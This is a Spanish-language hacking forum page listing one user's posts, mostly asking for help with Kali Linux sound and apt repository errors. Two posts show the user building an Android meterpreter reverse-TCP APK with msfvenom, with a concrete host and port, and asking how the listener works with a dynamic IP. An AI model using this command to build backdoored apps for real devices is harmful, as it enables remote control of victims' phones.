Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - chiri76

#1
GNU/Linux / sin sonido en kali linux
24 Marzo 2021, 17:47 PM
root@CHIRI ~# aplay --list-devices
aplay: device_list:274: no soundcards found...
root@CHIRI ~#
Tengo un problema con la tarjeta de sonido,
AlGUIEN ME PUEDE ECHAR UNA MANO? LLEVO DIAS BUSCANDO Y NO ENCUENTRO SULUCION
#2
Software / sin sonido en kali linux
22 Marzo 2021, 21:41 PM
Alguien puede ayudarme con los errore de sonido en kali linux?

KMix must be restarted for the volume overdrive setting to take effect.

The volume of PulseAudio or MPRIS2 dynamic controls will not be restored.

Estos son los errores
cuando pongo youtube,por ejemplo,la barra semueve detectando sonido pero no emite ningun sonido
#3
GNU/Linux / Re: actualizacion kali linux
22 Marzo 2021, 21:20 PM
Ya esta solucionad,tenia varios archivos grabados con distintos repositorios que estuve probando.
Los eliminé como me dijiste y ya actualiza correctamente.

Solo deje el bueno en el source.list
Muchas gracias
#4
GNU/Linux / Re: actualizacion kali linux
21 Marzo 2021, 23:45 PM
root@CHIRI ~# apt-get update && apt-get upgrade -y
Hit:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease                   
Hit:2 http://kali.mirror.garr.it/mirrors/kali kali-rolling InRelease                                           
Hit:3 http://dl.google.com/linux/chrome/deb stable InRelease                                             
Ign:4 http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute InRelease       
Err:5 http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute Release
  404  Not Found [IP: 91.189.95.85 80]
Reading package lists... Done
E: The repository 'http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
root@CHIRI ~ [100]#


NADA,LO MISMO ME HACE
#5
GNU/Linux / Re: actualizacion kali linux
21 Marzo 2021, 23:39 PM
  GNU nano 5.4                                  /etc/apt/sources.list                                           
deb http://kali.mirror.garr.it/mirrors/kali kali-rolling main non-free contrib
deb-src http://kali.mirror.garr.it/mirrors/kali kali-rolling main non-free contrib


estos son los que tengo en el source.list
#6
GNU/Linux / Re: actualizacion kali linux
21 Marzo 2021, 23:37 PM
y cuales son los buenos? :-[
#7
GNU/Linux / actualizacion kali linux
21 Marzo 2021, 21:46 PM
root@CHIRI ~# apt-get update && apt-get dist-upgrade -y
Hit:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease
Ign:2 http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute InRelease               
Err:3 http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute Release               
  404  Not Found [IP: 91.189.95.85 80]
Hit:4 http://dl.google.com/linux/chrome/deb stable InRelease       
Hit:5 http://kali.mirror.garr.it/mirrors/kali kali-rolling InRelease
Reading package lists... Done                                       
E: The repository 'http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
root@CHIRI ~ [100]# apt-get update && apt-get upgrade -y
Hit:1 http://kali.mirror.garr.it/mirrors/kali kali-rolling InRelease
Hit:2 http://dl.google.com/linux/chrome/deb stable InRelease                                         
Ign:3 http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute InRelease                         
Hit:4 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease         
Err:5 http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute Release
  404  Not Found [IP: 91.189.95.85 80]
Reading package lists... Done                     
E: The repository 'http://ppa.launchpad.net/nilarimogard/webupd8/ubuntu hirsute Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
root@CHIRI ~ [100]#

Alguien me puede ayudar con la actualizacion de kali linux?
#8
Hacking / Sonido en kali linux
14 Marzo 2021, 23:58 PM
Hola alguien me puede decir como poner el sonido en kali linux sin ser root?? y si se puede ? me sale este error y ya probe a modificar el daemon.conf pero no tengo permisos. Gracias.

root@CHIRI /h/chiri76# sudo apt install alsa-base alsa-tools alsa-tools-gui alsa-utils alsa-oss alsamixergui libalsaplayer0
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package alsa-base
#9
Hacking / Re: error en metasploit
14 Marzo 2021, 23:45 PM
Cita de: EdePC en 10 Marzo 2021, 19:40 PM
El único error es el primero que dice Error porque has puesto Android en lugar de android, luego lo demás son advertencias por no especificar la plataforma, arquitectura y encoder, PERO msfvenom es muy capaz de deducirlo a través del Payload que estás usando. O sea error no hay.


Con minuscula (android) tambien da error. El caso es que la apk la generó igualmente.

Ahora tengo que funcionar con ese mismo HOST verdad? porque tengo ip dinamica

Gracias!
#10
Hacking / error en metaexploit
10 Marzo 2021, 10:54 AM
  • exec: msfvenom -p Android/meterpreter/reverse_tcp LHOST=172.18.104.213 LPORT=28 R > hastalapolla.apk

    Error: invalid payload: Android/meterpreter/reverse_tcp
    msf6 > msfvenom -p android/meterpreter/reverse_tcp LHOST=172.18.104.213 LPORT=28 R > hastalapolla.apk
  • exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=172.18.104.213 LPORT=28 R > hastalapolla.apk

    [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
    [-] No arch selected, selecting arch: dalvik from the payload
    No encoder specified, outputting raw payload
    Payload size: 10191 bytes

    Alguien puede ayudarme con este error?????